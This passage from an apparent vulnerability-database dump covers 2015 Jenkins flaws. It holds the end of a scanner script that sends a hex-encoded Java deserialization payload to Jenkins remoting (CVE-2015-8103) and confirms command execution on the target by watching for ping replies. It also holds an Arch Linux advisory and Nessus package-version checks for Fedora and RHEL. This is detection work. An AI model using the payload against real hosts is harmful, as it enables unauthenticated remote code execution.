0x04,0xff,0xff,0xff,0xfd,0x78,0x70,0x00,0x00,0x00,0x43,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x43,0x6f,0x6d,0x6d,0x61,\n 0x6e,0x64,0x74,0x00,0x0c,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x2e,0x6a,0x61,0x76,0x61,0x74,0x00,0x06,0x3c,0x69,0x6e,0x69,0x74,0x3e,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,\n 0x32,0x71,0x00,0x7e,0x00,0x15,0x71,0x00,0x7e,0x00,0x16,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x63,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,\n 
0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x74,0x00,0x0c,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,\n 0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x02,0x39,0x74,0x00,0x32,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,\n 0x74,0x65,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x24,0x52,0x50,0x43,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x74,0x00,0x1c,0x52,0x65,\n 0x6d,0x6f,0x74,0x65,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,\n 0x00,0x13,0x00,0x00,0x00,0xf6,0x74,0x00,0x27,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,0x74,0x65,0x49,0x6e,0x76,0x6f,\n 0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x71,0x00,0x7e,0x00,0x1e,0x74,0x00,0x06,0x69,0x6e,0x76,0x6f,0x6b,0x65,0x73,0x71,0x00,0x7e,0x00,0x13,0xff,0xff,\n 0xff,0xff,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x24,0x50,0x72,0x6f,0x78,0x79,0x31,0x70,0x74,0x00,0x0f,0x77,0x61,0x69,\n 0x74,0x46,0x6f,0x72,0x50,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x04,0xe7,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,\n 0x6f,0x74,0x69,0x6e,0x67,0x2e,0x43,0x68,0x61,0x6e,0x6e,0x65,0x6c,0x74,0x00,0x0c,0x43,0x68,0x61,0x6e,0x6e,0x65,0x6c,0x2e,0x6a,0x61,0x76,0x61,0x74,0x00,0x15,0x77,0x61,0x69,0x74,\n 0x46,0x6f,0x72,0x52,0x65,0x6d,0x6f,0x74,0x65,0x50,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x93,0x74,0x00,0x0e,0x68,0x75,0x64,0x73,0x6f,\n 0x6e,0x2e,0x63,0x6c,0x69,0x2e,0x43,0x4c,0x49,0x74,0x00,0x08,0x43,0x4c,0x49,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x48,\n 
0x74,0x00,0x1f,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x63,0x6c,0x69,0x2e,0x43,0x4c,0x49,0x43,0x6f,0x6e,0x6e,0x65,0x63,0x74,0x69,0x6f,0x6e,0x46,0x61,0x63,0x74,0x6f,0x72,0x79,0x74,\n 0x00,0x19,0x43,0x4c,0x49,0x43,0x6f,0x6e,0x6e,0x65,0x63,0x74,0x69,0x6f,0x6e,0x46,0x61,0x63,0x74,0x6f,0x72,0x79,0x2e,0x6a,0x61,0x76,0x61,0x74,0x00,0x07,0x63,0x6f,0x6e,0x6e,0x65,\n 0x63,0x74,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x01,0xdf,0x71,0x00,0x7e,0x00,0x2a,0x71,0x00,0x7e,0x00,0x2b,0x74,0x00,0x05,0x5f,0x6d,0x61,0x69,0x6e,0x73,0x71,0x00,0x7e,0x00,\n 0x13,0x00,0x00,0x01,0x86,0x71,0x00,0x7e,0x00,0x2a,0x71,0x00,0x7e,0x00,0x2b,0x74,0x00,0x04,0x6d,0x61,0x69,0x6e,0x73,0x72,0x00,0x26,0x6a,0x61,0x76,0x61,0x2e,0x75,0x74,0x69,0x6c,\n 0x2e,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x24,0x55,0x6e,0x6d,0x6f,0x64,0x69,0x66,0x69,0x61,0x62,0x6c,0x65,0x4c,0x69,0x73,0x74,0xfc,0x0f,0x25,0x31,0xb5,0xec,\n 0x8e,0x10,0x02,0x00,0x01,0x4c,0x00,0x04,0x6c,0x69,0x73,0x74,0x71,0x00,0x7e,0x00,0x0f,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x72,0x00,0x2c,0x6a,0x61,0x76,0x61,0x2e,0x75,0x74,0x69,\n 0x6c,0x2e,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x24,0x55,0x6e,0x6d,0x6f,0x64,0x69,0x66,0x69,0x61,0x62,0x6c,0x65,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,\n 0x6e,0x19,0x42,0x00,0x80,0xcb,0x5e,0xf7,0x1e,0x02,0x00,0x01,0x4c,0x00,0x01,0x63,0x74,0x00,0x16,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,0x6c,0x2f,0x43,0x6f,0x6c,0x6c,0x65,\n 0x63,0x74,0x69,0x6f,0x6e,0x3b,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x70,0x73,0x72,0x00,0x13,0x6a,0x61,0x76,0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x41,0x72,0x72,0x61,0x79,0x4c,0x69,\n 0x73,0x74,0x78,0x81,0xd2,0x1d,0x99,0xc7,0x61,0x9d,0x03,0x00,0x01,0x49,0x00,0x04,0x73,0x69,0x7a,0x65,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x70,0x00,0x00,0x00,0x00,0x77,0x04,0x00,\n 0x00,0x00,0x00,0x78,0x71,0x00,0x7e,0x00,0x39,0x78,0x71,0x00,0x7e,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x00,0x00,0x01,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,\n 
0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x90,0xce,0x58,0x9f,0x10,0x73,0x29,0x6c,0x02,0x00,0x00,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x70,\n 0x00,0x00,0x00,0x01,0x74,0x00,0x18,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x63,0x6c,0x69,0x2e,0x43,0x6c,0x69,0x45,0x6e,0x74,0x72,0x79,0x50,0x6f,0x69,0x6e,0x74,0x71,0x00,0x7e,0x00,\n 0x24,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0xad,0xd2,0x56,0xe7,0xe9,0x1d,0x7b,0x47,0x02,0x00,0x00,\n 0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x74,0x00,0x1d,0x52,\n 0x50,0x43,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x28,0x31,0x2c,0x77,0x61,0x69,0x74,0x46,0x6f,0x72,0x50,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x29);\n\nsend( socket:soc, data:payload );\n\nfor( i = 0; i < 3; i++ )\n{\n res = send_capture( socket:soc,\n data:\"\",\n timeout:2,\n pcap_filter: string( \"icmp and icmp[0] = 8 and dst host \", this_host(), \" and src host \", get_host_ip() ) );\n\n if( res && ( win || vtcheck >< res ) )\n {\n close( soc );\n report = 'By sending a special crafted serialized stream it was possible to execute `' + cmd + '` on the remote host\\nReceived answer:\\n\\n' + hexdump(ddata:( res ) );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( soc ) close( soc );\n\nexit( 0 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:40", "bulletinFamily": "unix", "description": "- CVE-2015-5317 (information leakage)\n\nThe Jenkins UI allowed users to see the names of jobs and builds\notherwise inaccessible to them on the "Fingerprints" pages if those\nshared file fingerprints with fingerprinted files in accessible jobs.\n\n- CVE-2015-5318 (cross-site request forgery)\n\nThe salt used to generate the CSRF protection tokens was a publicly\naccessible value, allowing 
malicious users to circumvent CSRF protection\nby generating the correct token.\n\n- CVE-2015-5319 (XML external entity injection)\n\nWhen creating a job using the create-job CLI command, external entities\nare not discarded (nor processed). If these job configurations are\nprocessed by another user with an XML-aware tool (e.g. using\nget-job/update-job), information from that user's computer may be\ndisclosed to Jenkins and the attacker.\n\n- CVE-2015-5320 (access restriction bypass)\n\nJNLP slave connections did not verify that the correct secret was\nsupplied, which allowed malicious users to connect their own machines as\nslaves to Jenkins knowing only the name of the slave. This enables\nattackers to take over Jenkins (unless the slave-to-master security\nsubsystem is enabled) or gain access to private data like keys and\nsource code.\n\n- CVE-2015-5321 (information leakage)\n\nThe CLI command overview and help pages in Jenkins were accessible\nwithout Overall/Read permission, resulting in disclosure of the names of\nconfigured slaves (and contents of other sidepanel widgets, if present)\nto unauthorized users.\n\n- CVE-2015-5322 (directory traversal)\n\nAccess to the /jnlpJars/ URL was not limited to the specific JAR files\nusers needed to access, allowing browsing directories and downloading\nother files in the Jenkins servlet resources, such as web.xml.\n\n- CVE-2015-5323 (access restriction bypass)\n\nAPI tokens of other users were exposed to admins by default. 
On\ninstances that don't implicitly grant RunScripts permission to admins,\nthis allowed admins to run scripts with another user's credentials.\n\n- CVE-2015-5324 (information leakage)\n\nThe /queue/api URL could return information about items not accessible\nto the current user (such as parameter names and values, build names,\nproject descriptions).\n\n- CVE-2015-5325 (access restriction bypass)\n\nSlaves connecting via JNLP were not subject to the optional\nslave-to-master access control documented at\n<A HREF=\"http://jenkins-ci.org/security-144\">http://jenkins-ci.org/security-144</A> (CVE-2014-3665).\n\n- CVE-2015-5326 (cross-site scripting)\n\nUsers with the permission to take slave nodes offline can enter\narbitrary HTML that gets shown unescaped to users visiting the slave\noverview page.\n\n- CVE-2015-8103 (arbitrary code execution)\n\nUnsafe deserialization allows unauthenticated remote attackers to run\narbitrary code on the Jenkins master.", "modified": "2015-11-18T00:00:00", "published": "2015-11-18T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-November/000439.html", "id": "ASA-201511-11", "title": "jenkins: multiple issues", "type": "archlinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-11-01T02:27:25", "bulletinFamily": "scanner", "description": "Update to 1.625.2 - Resolves: CVE-2015-5317, CVE-2015-5318,\nCVE-2015-5319, CVE-2015-5320, CVE-2015-5324, CVE-2015-5321,\nCVE-2015-5322, CVE-2015-5323, CVE-2015-5325, CVE-2015-5326,\nSECURITY-218\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2015-D02FEEBD15.NASL", "href": "https://www.tenable.com/plugins/nessus/89418", "published": "2016-03-04T00:00:00", "title": "Fedora 23 : jenkins-1.625.2-2.fc23 / jenkins-remoting-2.53-1.fc23 (2015-d02feebd15)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-d02feebd15.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89418);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2016/03/04 16:10:31 $\");\n\n script_xref(name:\"FEDORA\", value:\"2015-d02feebd15\");\n\n script_name(english:\"Fedora 23 : jenkins-1.625.2-2.fc23 / jenkins-remoting-2.53-1.fc23 (2015-d02feebd15)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 1.625.2 - Resolves: CVE-2015-5317, CVE-2015-5318,\nCVE-2015-5319, CVE-2015-5320, CVE-2015-5324, CVE-2015-5321,\nCVE-2015-5322, CVE-2015-5323, CVE-2015-5325, CVE-2015-5326,\nSECURITY-218\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-November/172425.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ad29bec3\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-November/172428.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c6577858\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jenkins and / or jenkins-remoting packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", 
string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"jenkins-1.625.2-2.fc23\")) flag++;\nif (rpm_check(release:\"FC23\", reference:\"jenkins-remoting-2.53-1.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jenkins / jenkins-remoting\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:21:06", "bulletinFamily": "scanner", "description": "Red Hat OpenShift Enterprise release 2.2.9, which fixes several\nsecurity issues, several bugs, and introduces feature enhancements, is\nnow available.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. 
Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nOpenShift Enterprise by Red Hat is the company", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2016-0489.NASL", "href": "https://www.tenable.com/plugins/nessus/119368", "published": "2018-12-04T00:00:00", "title": "RHEL 6 : Red Hat OpenShift Enterprise 2.2.9 (RHSA-2016:0489)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0489. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119368);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2015-5254\", \"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\", \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\", \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\", \"CVE-2015-8103\");\n script_xref(name:\"RHSA\", value:\"2016:0489\");\n\n script_name(english:\"RHEL 6 : Red Hat OpenShift Enterprise 2.2.9 (RHSA-2016:0489)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Red Hat OpenShift Enterprise release 2.2.9, which fixes several\nsecurity issues, several bugs, and introduces feature enhancements, is\nnow available.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. 
Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nOpenShift Enterprise by Red Hat is the company's cloud computing\nPlatform-as-a-Service (PaaS) solution designed for on-premise or\nprivate cloud deployments.\n\nThe following security issue is addressed with this release :\n\nIt was found that ActiveMQ did not safely handle user-supplied data\nwhen deserializing objects. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the ActiveMQ\napplication. (CVE-2015-5254)\n\nAn update for Jenkins Continuous Integration Server that addresses a\nlarge number of security issues including XSS, CSRF, information\ndisclosure and code execution have been addressed as well.\n(CVE-2015-5317, CVE-2015-5318, CVE-2015-5319, CVE-2015-5320,\nCVE-2015-5321, CVE-2015-5322, CVE-2015-5323, CVE-2015-5324,\nCVE-2015-5325, CVE-2015-5326, CVE-2015-7537, CVE-2015-7538,\nCVE-2015-7539, CVE-2015-8103)\n\nSpace precludes documenting all of the bug fixes in this advisory. 
See\nthe OpenShift Enterprise Technical Notes, which will be updated\nshortly for release 2.2.9, for details about these changes :\n\nhttps://access.redhat.com/documentation/en-US/OpenShift_Enterprise/2/\nhtml-single/Technical_Notes/index.html\n\nAll OpenShift Enterprise 2 users are advised to upgrade to these\nupdated packages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0489\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7538\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7539\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5318\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-8103\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5324\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5325\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5254\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5326\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5321\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://access.redhat.com/security/cve/cve-2015-5319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5323\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5322\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenNMS Java Object Unserialization Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:activemq-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-enterprise-release\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-enterprise-upgrade-node\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-enterprise-yum-validator\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:openshift-origin-cartridge-cron\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-origin-cartridge-haproxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-origin-cartridge-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-origin-cartridge-php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-origin-cartridge-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-origin-msg-node-mcollective\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-origin-node-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-origin-node-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-openshift-origin-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-openshift-origin-frontend-apache-vhost\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-openshift-origin-node\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0489\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"openshift-origin\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"OpenShift\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"activemq-client-5.9.0-6.redhat.611454.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jenkins-1.625.3-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-enterprise-release-2.2.9-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-enterprise-upgrade-node-2.2.9-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", 